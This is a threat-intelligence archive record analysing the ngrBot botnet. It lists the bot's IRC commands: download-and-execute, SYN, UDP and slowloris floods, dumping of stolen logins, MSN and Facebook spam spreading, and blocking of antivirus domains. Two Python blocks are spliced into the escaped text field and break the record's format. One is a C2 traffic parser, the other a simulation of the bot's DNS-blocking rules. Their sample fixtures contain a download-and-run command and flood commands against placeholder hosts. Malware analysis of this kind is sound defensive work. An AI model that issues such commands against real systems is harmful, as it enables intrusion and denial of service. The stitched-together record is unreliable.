{
	"id": "ccf91557-8f3c-4af5-b322-c6632a4cc96e",
	"created_at": "2026-04-06T00:15:36.476484Z",
	"updated_at": "2026-04-10T13:13:00.075452Z",
	"deleted_at": null,
	"sha1_hash": "cc20a9757b0a67efa65c556c554fe6eda6cb74c3",
	"title": "Analysis of ngrBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 170592,
	"plain_text": "Analysis of ngrBot\r\nBy Kimberly\r\nArchived: 2026-04-05 20:39:51 UTC\r\nNote: parameters within \"[\" and \"]\" are required, and parameters within \"\u003c\" and \"\u003e\" are optional.\r\n\r\n!dl [url] \u003cmd5\u003e \u003c-r\u003e \u003c-n\u003e\r\n\r\nThe bot downloads and executes a file from the specified URL.\r\n\r\nParameters\r\nurl URL of the file to download and execute\r\nmd5 Optional MD5 hash of the file to download, used as an integrity check; the bot will not redownload a file with the same hash until reboot\r\n-r Enable RusKill on the downloaded file\r\n-n Disable PDef+ on the system until reboot or until it is manually re-enabled\r\n\r\n-------------------------\r\n\r\n!up [url] [md5] \u003c-r\u003e\r\n\r\nThe bot updates its file, but the update does not take effect until the system is restarted.\r\n\r\nParameters\r\nurl URL of the file to update to\r\nmd5 MD5 hash of the update file\r\n-r Reboot immediately\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 1 of 10\r\n\r\n-------------------------\r\n\r\n!die\r\n\r\nThe bot disconnects from the IRC server and does not reconnect until its system reboots.\r\n\r\n-------------------------\r\n\r\n!rm\r\n\r\nThe bot removes itself from the system.\r\n\r\n-------------------------\r\n\r\n!m [state]\r\n\r\nEnable/disable all output to IRC regarding commands and features.\r\n\r\nParameters\r\nstate Enable (on) or disable (off) muting of all output to IRC\r\n\r\n-------------------------\r\n\r\n!v\r\n\r\nThe bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.\r\n
-------------------------\r\n\r\n!vs [url] [state]\r\n\r\nThe bot creates a browser instance and visits the specified link.\r\n\r\nParameters\r\nurl URL to open\r\nstate Open in a visible (1) or invisible (0) window\r\n\r\n-------------------------\r\n\r\n!rc \u003c-n|-g\u003e\r\n\r\nThe bot disconnects from the IRC server and waits 15 seconds before reconnecting.\r\n\r\nParameters\r\n-n Only reconnect if the bot is currently marked as \"new\"\r\n-g Only reconnect if the bot did not previously succeed in determining its country using GeoIP\r\n\r\n-------------------------\r\n\r\n!j [\u003c[rule] [options]\u003e channel] \u003ckey\u003e\r\n\r\nThe bot joins the specified channel. If a rule is specified, the bot only joins if the rule applies to it.\r\n\r\nParameters\r\nrule Optional rule for the bot to check. Supported options are -c (country) and -v (version)\r\noptions Options for the selected rule\r\nWith -c, you can put a single country code or multiple comma-separated country codes\r\nWith -v, you can put a single version or multiple comma-separated versions\r\nchannel Channel to join\r\nkey Key of the channel to join\r\n\r\n-------------------------\r\n\r\n!p [\u003c[rule] [options]\u003e channel]\r\n\r\nThe bot parts the specified channel; rules work as for !j.\r\n\r\nParameters\r\nrule Optional rule for the bot to check. Supported options are -c (country) and -v (version)\r\noptions Options for the selected rule\r\nWith -c, you can put a single country code or multiple comma-separated country codes\r\nWith -v, you can put a single version or multiple comma-separated versions\r\nchannel Channel to part\r\n
-------------------------\r\n\r\n!s \u003crule\u003e\r\n\r\nThe bot joins the channel for its country (e.g. Russian bots (RU) join #RU).\r\n\r\nParameters\r\nrule Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)\r\n\r\n-------------------------\r\n\r\n!us \u003crule\u003e\r\n\r\nThe bot parts the channel for its country (e.g. Russian bots (RU) part #RU).\r\n\r\nParameters\r\nrule Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)\r\n\r\n-------------------------\r\n\r\n!mod [module] [state]\r\n\r\nEnable/disable modules that use hooks.\r\nNote: disabling bdns only unblocks AV and other preset sites, not sites set using the !mdns command.\r\n\r\nParameters\r\nmodule Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi\r\nstate Enable (on) or disable (off) the module\r\n\r\n-------------------------\r\n\r\n!stats \u003c-l|-s\u003e\r\n\r\nRetrieves statistics for spreading and/or login grabbing. If no parameters are specified, it displays both.\r\n\r\nParameters\r\n-l Display login grabber stats\r\n-s Display spreading stats\r\n\r\n-------------------------\r\n\r\n!logins \u003csite|-c\u003e\r\n\r\nRetrieves all grabbed and cached logins and prints them to the channel or PM. Can also be used to clear the login cache.\r\n
Parameters\r\nsite Site to retrieve logins for (case insensitive; see here for the list of sites)\r\n-c Clear the login cache\r\n\r\n-------------------------\r\n\r\n!stop\r\n\r\nThe bot ends all running flood tasks.\r\n\r\n-------------------------\r\n\r\n!ssyn [host] [port] [seconds]\r\n\r\nThe bot floods the target with TCP SYN requests for the given number of seconds.\r\n\r\nParameters\r\nhost Host to flood with SYN requests\r\nport Port to flood. If 0, the bot uses a random port\r\nseconds Number of seconds to flood the target\r\n\r\n-------------------------\r\n\r\n!udp [host] [port] [seconds]\r\n\r\nThe bot floods the target with UDP packets for the given number of seconds.\r\n\r\nParameters\r\nhost Host to flood with UDP packets\r\nport Port to flood. If 0, the bot uses a random port\r\nseconds Number of seconds to flood the target\r\n\r\n-------------------------\r\n\r\n!slow [host] [minutes]\r\n\r\nThe bot floods the target using slowloris for the given number of minutes.\r\n\r\nParameters\r\nhost Host to flood using slowloris\r\nminutes Number of minutes to flood the target\r\n\r\n-------------------------\r\n\r\n!msn.int [interval]\r\n\r\nSet the number of MSN messages in a conversation before one is replaced with your spreading message. See here for more information.\r\nNote: use '#' for a random interval between 1 and 9.\r\n\r\nParameters\r\ninterval Number of MSN messages before spread\r\n\r\n-------------------------\r\n\r\n!msn.set [message]\r\n\r\nSet the message that will be used for MSN spreading. See here for more information.\r\nNote: use '#' for a random digit and '*' for a random lowercase letter.\r\n\r\nParameters\r\nmessage Message to spread via MSN\r\n
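Parsing the command syntax documented above, from !dl through the flood commands, as an added example in Python (not code from the original page or from ngrBot itself): the grammar table encodes each command's [required] and <optional> parameters and flags, !j and !p get the -c/-v rule prefix together with the check a bot would run before joining or parting, and a small triage routine pulls payload URLs, expected MD5 hashes and DDoS targets out of captured IRC traffic. The IRC lines, nick, channel, hosts, URLs and hashes are constructed for the demo; that surplus tokens are ignored and that country codes are matched case-insensitively are assumptions about the bot, not statements from the page.

```python
import re

# Constructed sample IRC traffic for this demo; the nick, channel, hosts,
# URLs and hashes are assumptions, not indicators taken from the page.
SAMPLE_IRC = '''
:op!op@c2.invalid PRIVMSG #main :!dl http://203.0.113.10/drop.exe d41d8cd98f00b204e9800998ecf8427e -r
:op!op@c2.invalid PRIVMSG #main :!up http://203.0.113.10/v2.exe 098f6bcd4621d373cade4e832627b4f6
:op!op@c2.invalid PRIVMSG #main :!j -c RU,UA #ru-only secretkey
:op!op@c2.invalid PRIVMSG #main :!ssyn 198.51.100.7 80 120
:op!op@c2.invalid PRIVMSG #main :!slow 198.51.100.8 30
:op!op@c2.invalid PRIVMSG #main :!rc -g
:op!op@c2.invalid PRIVMSG #main :hello everyone
'''

MD5_RE = re.compile(r'^[0-9a-f]{32}$', re.IGNORECASE)

# Per command, as documented on the page: required positionals, optional positionals,
# and the flags that may follow them. Commands without parameters need no entry.
GRAMMAR = {
    'dl':      (('url',), ('md5',), {'-r', '-n'}),
    'up':      (('url', 'md5'), (), {'-r'}),
    'vs':      (('url', 'state'), (), set()),
    'rc':      ((), (), {'-n', '-g'}),
    'stats':   ((), (), {'-l', '-s'}),
    'logins':  ((), ('site',), {'-c'}),
    'ssyn':    (('host', 'port', 'seconds'), (), set()),
    'udp':     (('host', 'port', 'seconds'), (), set()),
    'slow':    (('host', 'minutes'), (), set()),
    'msn.int': (('interval',), (), set()),
}

def privmsg_text(line):
    '''Trailing text of an IRC PRIVMSG line, or None for any other line.'''
    parts = line.strip().split(' ', 3)
    if len(parts) < 4 or parts[1] != 'PRIVMSG':
        return None
    return parts[3][1:] if parts[3].startswith(':') else parts[3]

def parse_command(text):
    '''Parse one ngrBot command into {name, args, flags, rule}; None if the
    text is not a command, ValueError if it is malformed.'''
    tokens = text.split()
    if not tokens or not tokens[0].startswith('!'):
        return None
    name, rest = tokens[0][1:].lower(), tokens[1:]
    cmd = {'name': name, 'args': {}, 'flags': set(), 'rule': None}
    if name in ('j', 'p'):                     # optional [rule options] prefix
        if rest and rest[0] in ('-c', '-v'):
            if len(rest) < 2:
                raise ValueError(name + ': rule needs options')
            cmd['rule'], rest = (rest[0], tuple(rest[1].split(','))), rest[2:]
        if not rest:
            raise ValueError(name + ': channel is required')
        cmd['args']['channel'] = rest[0]
        if name == 'j' and len(rest) > 1:
            cmd['args']['key'] = rest[1]
        return cmd
    if name not in GRAMMAR:                    # !die, !rm, !msn.set ... kept raw
        cmd['args']['raw'] = rest
        return cmd
    required, optional, known_flags = GRAMMAR[name]
    cmd['flags'] = {t for t in rest if t in known_flags}
    positional = [t for t in rest if t not in known_flags]
    if len(positional) < len(required):
        raise ValueError(name + ': missing required parameter')
    cmd['args'] = dict(zip(required + optional, positional))   # surplus tokens ignored (assumption)
    md5 = cmd['args'].get('md5')
    if md5 is not None and not MD5_RE.match(md5):
        raise ValueError(name + ': bad md5 ' + md5)
    return cmd

def rule_applies(cmd, country, version):
    '''Would a bot with this GeoIP country and version act on a !j/!p rule?'''
    if cmd['rule'] is None:
        return True
    kind, values = cmd['rule']
    if kind == '-c':                           # case-insensitive compare is an assumption
        return country.upper() in {v.upper() for v in values}
    return version in values

def triage(irc_log):
    '''Pull payload URLs, expected hashes and DDoS targets out of captured C2 traffic.'''
    found = {'commands': [], 'urls': [], 'md5s': [], 'targets': [], 'errors': []}
    for line in irc_log.splitlines():
        text = privmsg_text(line)
        if not text or not text.startswith('!'):
            continue
        try:
            cmd = parse_command(text)
        except ValueError as exc:
            found['errors'].append(str(exc))
            continue
        found['commands'].append(cmd['name'])
        if 'url' in cmd['args']:
            found['urls'].append(cmd['args']['url'])
        if 'md5' in cmd['args']:
            found['md5s'].append(cmd['args']['md5'].lower())
        if cmd['name'] in ('ssyn', 'udp', 'slow'):
            found['targets'].append(cmd['args']['host'])
    return found
```

Run triage() over a PRIVMSG capture to get the URLs and hashes worth hunting for on endpoints; a malformed command line is recorded under errors rather than aborting the pass, and rule_applies() lets you work out which part of a botnet a rule-gated !j was aimed at.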
-------------------------\r\n\r\n!http.int [interval]\r\n\r\nSet the number of Facebook messages in a conversation before one is replaced with your spreading message. See here for more information.\r\nNote: use '#' for a random interval between 1 and 9.\r\n\r\nParameters\r\ninterval Number of Facebook messages before spread\r\n\r\n-------------------------\r\n\r\n!http.set [message]\r\n\r\nSet the message that will be used for Facebook spreading. See here for more information.\r\nNote: use '#' for a random digit and '*' for a random lowercase letter.\r\n\r\nParameters\r\nmessage Message to spread via Facebook\r\n\r\n-------------------------\r\n\r\n!mdns [url|[domain1 \u003cdomain2|ip2\u003e]|[ip1 \u003cip2\u003e]]\r\n\r\nThe bot blocks access to, or redirects, the specified domain/IP address.\r\nNote: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.\r\nNote: it must be the exact domain; for example \"example.com\" will not include \"www.example.com\". Wildcard support will be added in an update.\r\n
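The !mdns blocking and redirect behaviour described above, as an added Python example (not code from the page or from ngrBot): a parser for the one-rule-per-line format, the dispatch between a rule-file URL and an inline rule, and a simulated hooked lookup that applies the exact-match rule from the note (example.com does not cover www.example.com) and sets aside IP-to-domain lines, which the page says do not yet work. The domains, addresses and upstream answers are constructed; that the substitute in a domain-to-domain redirect is resolved upstream without being re-checked, and that https URLs are accepted for the rule file, are assumptions.

```python
import ipaddress

# Constructed rule file in the !mdns syntax (domain1 [domain2|ip2] or
# ip1 [ip2], one rule per line). The names and addresses are assumptions.
SAMPLE_RULES = '''
avvendor.example
update.avvendor.example 203.0.113.5
bank.example login.bank.example
198.51.100.20 203.0.113.9
198.51.100.21
203.0.113.9 evil.example
'''

# Constructed stand-in for the real resolver the hooked lookup falls through to.
UPSTREAM = {
    'www.avvendor.example': '198.51.100.30',
    'login.bank.example': '198.51.100.40',
    'bank.example': '198.51.100.41',
    'tracker.example': '198.51.100.50',
}

def is_ip(token):
    try:
        ipaddress.ip_address(token)
        return True
    except ValueError:
        return False

def parse_rules(text):
    '''Parse !mdns rules. Returns (rules, unsupported): rules maps a domain or
    IP to its redirect target (None = block); unsupported collects IP-to-domain
    lines, which the page says do not yet work.'''
    rules, unsupported = {}, []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        if len(parts) > 2:
            raise ValueError('too many fields: ' + raw)
        src = parts[0].lower()
        dst = parts[1].lower() if len(parts) == 2 else None
        if is_ip(src) and dst is not None and not is_ip(dst):
            unsupported.append(raw.strip())
            continue
        rules[src] = dst
    return rules, unsupported

def apply_mdns(rules, unsupported, argv, fetch):
    '''Apply one !mdns invocation: a single URL argument loads a rule file
    through the supplied fetch callable, anything else is one inline rule.'''
    if len(argv) == 1 and argv[0].lower().startswith(('http://', 'https://')):
        more, bad = parse_rules(fetch(argv[0]))
    else:
        more, bad = parse_rules(' '.join(argv))
    rules.update(more)
    unsupported.extend(bad)

def resolve(rules, name, upstream):
    '''Hooked lookup for a domain: exact match only, as the page states
    (example.com does not cover www.example.com). Returns an IP, or None
    when blocked or unresolvable. A domain-to-domain redirect resolves the
    substitute upstream without re-checking it (assumption).'''
    name = name.lower()
    if name not in rules:
        return upstream.get(name)
    dst = rules[name]
    if dst is None:
        return None
    return dst if is_ip(dst) else upstream.get(dst)

def connect(rules, ip):
    '''IP rules: redirect to ip2 when set, block (None) when not, else pass through.'''
    return rules[ip] if ip in rules else ip

def is_blocked(rules, name, upstream):
    '''True when a connection to name would end up nowhere after both hooks.'''
    ip = resolve(rules, name, upstream)
    return ip is None or connect(rules, ip) is None
```

The exact-match behaviour is what makes a hosts-style block list like this leaky for the operator and easy for a defender to probe: querying the www. form of a blocked AV domain still resolves, and the rule file fetched by URL is a plaintext artifact worth retrieving from the C2 for the full sinkhole list.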
Parameters\r\nurl Plaintext file with one redirect/blocking rule per line; rules are formatted in the same way as the command parameters\r\ndomain1 Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked\r\nip1 Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked\r\ndomain2 DNS queries for domain1 will be redirected to this domain if set\r\nip2 DNS queries for ip1 or domain1 will be redirected to this IP address if set\r\nSource: http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html"
	],
	"report_names": [
		"analysis-of-ngrbot.html"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434536,
	"ts_updated_at": 1775826780,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cc20a9757b0a67efa65c556c554fe6eda6cb74c3.pdf",
		"text": "https://archive.orkl.eu/cc20a9757b0a67efa65c556c554fe6eda6cb74c3.txt",
		"img": "https://archive.orkl.eu/cc20a9757b0a67efa65c556c554fe6eda6cb74c3.jpg"
	}
}